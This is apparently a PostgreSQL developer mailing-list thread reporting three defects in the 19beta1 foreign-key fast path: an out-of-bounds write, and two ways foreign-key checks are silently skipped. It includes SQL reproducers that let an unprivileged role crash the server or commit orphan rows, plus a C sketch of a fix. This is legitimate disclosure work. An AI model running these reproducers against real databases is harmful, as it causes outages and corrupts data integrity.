On Sat, Jun 6, 2026 at 17:31 Nikolay Samokhvalov <[email protected]> wrote:
> Hi hackers,
>
> The new FK existence-check fast path in ri_triggers.c (ri_FastPath*) runs
> user-defined code in the middle of a deferred batch flush, which yields at
> least three defects reachable by an unprivileged table owner. Present in
> master and verified in REL_19_BETA1.
>
> I identified these issues during recent security research with LLMs. While
> they have clear security implications (OOB write, integrity bypass), I am
> reporting them here because they are isolated to 19beta1 and absent in PG18
> and earlier; I don't have patches, only reproducers.
>
> Mechanism:
>
> For an INSERT/UPDATE on the referencing side the fast path buffers rows
> in a transaction-lived cache (ri_fastpath_cache, keyed by pg_constraint
> OID) and probes the PK index in groups, flushing when a per-constraint
> buffer reaches RI_FASTPATH_BATCH_SIZE (64) or when the trigger-firing
> pass ends (ri_FastPathEndBatch, an AfterTriggerBatchCallback). For a
> cross-type FK the flush calls the column's cast function
> (ri_FastPathFlushArray, the FunctionCall3 at line 3069) and the equality
> operator -- arbitrary user code, mid-flush. Line numbers below are from a
> REL_19_BETA1 build (commit 4b0bf07).
>
> Unprivileged vehicle (defects 1 and 3). No superuser, no contrib: a role
> creates a type it owns and an IMPLICIT cast from it to the PK type with a
> PL/pgSQL function, which ri_HashCompareOp wires into the fast path's cast
> slot. The examples below use a composite type. Default btree opclass,
> ordinary single-column FK, no GUC (fast path is unconditional for
> non-partitioned, non-temporal FKs, per ri_fastpath_is_applicable).
>
> 1) ri_FastPathBatchAdd (line 2859): out-of-bounds write on re-entry
>
> The write precedes the bound check, and batch_count is reset to 0 only at
> end of flush (ri_FastPathBatchFlush, line 2971), so it is 64 throughout a
> full-batch flush:
>
>     fpentry->batch[fpentry->batch_count] = ExecCopySlotHeapTuple(newslot);
>     fpentry->batch_count++;
>     if (fpentry->batch_count >= RI_FASTPATH_BATCH_SIZE)
>         ri_FastPathBatchFlush(fpentry, fk_rel, riinfo);
>
> There is no re-entrancy guard and ri_FastPathGetEntry returns the same
> entry, so user code that does DML on the same table during a full-batch
> flush re-enters with batch_count == 64 and writes batch[64], one past the
> array, overwriting the adjacent batch_count field (struct layout, lines
> 250-251). A single re-entrant row only stomps batch_count, which is then
> reset to 0 before reuse; the crash manifests once the re-entrant insert is
> itself large enough to fill and flush a batch, so the stomped batch_count
> is used as an array index (batch[garbage]) and as nvals in
> memset(matched, 0, nvals * sizeof(bool)) (line 3054).
>
> Reproduction (non-superuser; reliable SIGSEGV on --enable-cassert -O0;
> under -O2 the out-of-bounds write is of undefined effect):
>
>     create table parent(id int primary key);
>     insert into parent select g from generate_series(1,2000) g;
>     create type vch as (v int);
>     create function vcast(vch) returns int language plpgsql as $$
>     begin
>       if $1.v = 64 then
>         insert into child select row(g)::vch from generate_series(1001,1064) g;
>       end if;
>       return $1.v;
>     end$$;
>     create cast (vch as int) with function vcast(vch) as implicit;
>     create table child(a vch);
>     alter table child add constraint child_fkey
>       foreign key (a) references parent(id);
>     insert into child select row(g)::vch from generate_series(1,64) g;  -- crash
>     -- gdb: crash at ri_FastPathBatchAdd line 2866 with batch_count holding a
>     -- stomped HeapTuple pointer's low bits, i.e. batch[64] overwrote
>     -- batch_count; backend SIGSEGVs and the cluster restarts.
>
> 2) ri_FastPathSubXactCallback (line 4208): batch dropped on subxact abort
>
> On SUBXACT_EVENT_ABORT_SUB the callback discards the whole cache:
>
>     ri_fastpath_cache = NULL;
>     ri_fastpath_callback_registered = false;
>
> But batch[] holds outstanding rows of the enclosing transaction, not the
> aborting subxact. An internal subxact abort during after-trigger firing
> (PL/pgSQL BEGIN ... EXCEPTION) drops the buffered rows unflushed; their FK
> checks never run and orphans commit behind a constraint that still reports
> itself valid.
> No cast needed:
>
>     create table pk(id int primary key);
>     create table fk(a int, tag text);
>     insert into pk select g from generate_series(1,10) g;
>     alter table fk add constraint fk_a_fkey foreign key (a) references pk(id);
>     create function abort_subxact() returns trigger language plpgsql as $$
>     begin
>       if NEW.tag = 'boom' then
>         begin perform 1/0; exception when others then null; end;
>       end if;
>       return NEW;
>     end$$;
>     create trigger fk_after after insert on fk
>       for each row execute function abort_subxact();
>     insert into fk values (999,'bad'),(0,'boom'),(1,'ok'),(2,'ok'),(3,'ok');
>     -- INSERT 0 5, no error
>     select f.a from fk f left join pk p on f.a=p.id where p.id is null;
>     --   a
>     -- -----
>     --  999
>     --    0   (orphans)
>
>     -- the constraint still reports itself valid, and re-validation passes
>     -- while the orphans remain:
>     select convalidated from pg_constraint where conname = 'fk_a_fkey';
>     --  convalidated
>     -- --------------
>     --  t
>     alter table fk validate constraint fk_a_fkey;
>     -- ALTER TABLE (succeeds; does not re-scan committed rows)
>     select f.a from fk f left join pk p on f.a=p.id where p.id is null;
>     -- 999, 0 (orphans still present)
>
> Controls (no EXCEPTION; between-statement SAVEPOINT; DEFERRABLE INITIALLY
> DEFERRED) all behave correctly (FK violation raised, no orphans). The whole
> statement's buffered batch is discarded, not just the aborting row's check.
> The abort path also emits "WARNING: resource was not closed" (relation /
> index / TupleDesc), a resource leak consistent with the missing flush.
>
> 3) ri_FastPathEndBatch (line 4133): cross-table re-entry drops a check
>
> EndBatch flushes by iterating the cache with hash_seq_search (line 4143). If
> flush-time user code INSERTs into a different fast-path FK table,
> ri_FastPathGetEntry adds a new cache entry mid-scan; it can land in a bucket
> hash_seq_search already passed and is never reached.
> ri_FastPathTeardown (line 4165) then hash_destroys the cache (line 4188)
> without flushing entries that still have batch_count > 0, so that buffered
> check is discarded. This survives a per-entry guard for [1] (different
> entry, not a re-entry of the busy one):
>
>     create table parent(id int primary key);
>     insert into parent select g from generate_series(1,64) g;
>     create table child2(a int);
>     alter table child2 add constraint child2_fkey
>       foreign key (a) references parent(id);
>     create type vch as (v int);
>     create function vcast(vch) returns int language plpgsql as $$
>     begin
>       if $1.v = 1 then
>         insert into child2 values (999999);  -- orphan into a *different* FK
>       end if;
>       return $1.v;
>     end$$;
>     create cast (vch as int) with function vcast(vch) as implicit;
>     create table child(a vch);
>     alter table child add constraint child_fkey
>       foreign key (a) references parent(id);
>     insert into child values (row(1)::vch);  -- flushed at ri_FastPathEndBatch
>     select a from child2 where a not in (select id from parent);  -- => 999999
>     -- control: INSERT INTO child2 VALUES (999999);  -- correctly raises FK error
>
> Root cause / thoughts:
>
> All three stem from invoking user cast/operator code inside a deferred batch
> flush: while a per-entry batch is half-updated [1], while a cache-wide
> hash_seq_search is in progress and teardown drops non-empty entries [3], and
> against a subxact-abort invalidation that cannot tell parent-xact rows from
> aborted-subxact rows [2].
>
> - [1] Bound-check before the write in ri_FastPathBatchAdd, and add a
>   "flushing" flag to RI_FastPathEntry, rejecting re-entrant modification of a
>   busy entry (a nested per-row probe is unsafe: the flush may hold PK-index
>   buffer locks).
>
> - [3] Loop-flush in ri_FastPathEndBatch until no entry has batch_count > 0,
>   and/or flush non-empty entries in ri_FastPathTeardown before hash_destroy.
>
> - [2] Do not discard outstanding parent-xact rows on
>   SUBXACT_EVENT_ABORT_SUB; track the buffering subxact, or flush
>   immediate-constraint batches at subxact boundaries.
>
> - Unifying: a global "in fast-path flush" guard routing any re-entrant FK
>   check to the immediate per-row path, and reconsidering running user code
>   mid-flush at all.
>
> Nik

Thanks for the detailed report and reproducers. I’ve started looking into this.

- thanks, Amit
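
For discussion, here is a minimal standalone C model of suggestion [1] from the report: bound-check before the write, plus a "flushing" flag that rejects re-entrant adds to a busy entry. It is a sketch, not PostgreSQL code. ModelEntry, model_batch_add, model_flush, reentrant_hook and run_model are hypothetical names, plain ints stand in for HeapTuples, and a rejected row is only counted where real code would presumably raise an error.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define BATCH_SIZE 64           /* mirrors RI_FASTPATH_BATCH_SIZE in the report */

/* Hypothetical stand-in for RI_FastPathEntry; not the real struct layout. */
typedef struct ModelEntry
{
    int     batch[BATCH_SIZE];
    int     batch_count;
    bool    flushing;           /* the "flushing" flag proposed in [1] */
    int     flushed_rows;       /* demo bookkeeping only */
    int     rejected_rows;      /* demo bookkeeping only */
} ModelEntry;

/* Models user cast/operator code that runs in the middle of a flush. */
typedef void (*flush_hook) (ModelEntry *entry);

static void model_flush(ModelEntry *entry, flush_hook hook);

/* Returns true if the row was buffered, false if the add was rejected. */
static bool
model_batch_add(ModelEntry *entry, int row, flush_hook hook)
{
    /* Re-entrancy guard: never touch an entry that is being flushed. */
    if (entry->flushing)
    {
        entry->rejected_rows++;
        return false;
    }

    /* Bound check precedes the write, so batch[BATCH_SIZE] is never hit. */
    if (entry->batch_count >= BATCH_SIZE)
        model_flush(entry, hook);

    entry->batch[entry->batch_count++] = row;

    if (entry->batch_count >= BATCH_SIZE)
        model_flush(entry, hook);
    return true;
}

static void
model_flush(ModelEntry *entry, flush_hook hook)
{
    entry->flushing = true;
    if (hook != NULL)
        hook(entry);            /* "user code" runs while the batch is full */
    entry->flushed_rows += entry->batch_count;
    entry->batch_count = 0;     /* reset only at end of flush, as in the report */
    entry->flushing = false;
}

/* Models the reproducer: mid-flush DML against the same entry. */
static void
reentrant_hook(ModelEntry *entry)
{
    for (int i = 0; i < BATCH_SIZE; i++)
        model_batch_add(entry, 1000 + i, NULL);
}

/* Fills exactly one batch; the flush it triggers re-enters 64 times. */
ModelEntry
run_model(void)
{
    ModelEntry  entry = {0};

    for (int i = 0; i < BATCH_SIZE; i++)
        model_batch_add(&entry, i, reentrant_hook);
    return entry;
}
```

Calling run_model() from a test harness fills one batch of 64 rows, and the resulting flush attempts 64 re-entrant adds. With the guard in place each of those is rejected instead of writing past the array, and batch_count is back to 0 afterwards. Whether rejection or a fallback to the per-row path is the right behaviour is exactly the open question raised in the report.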
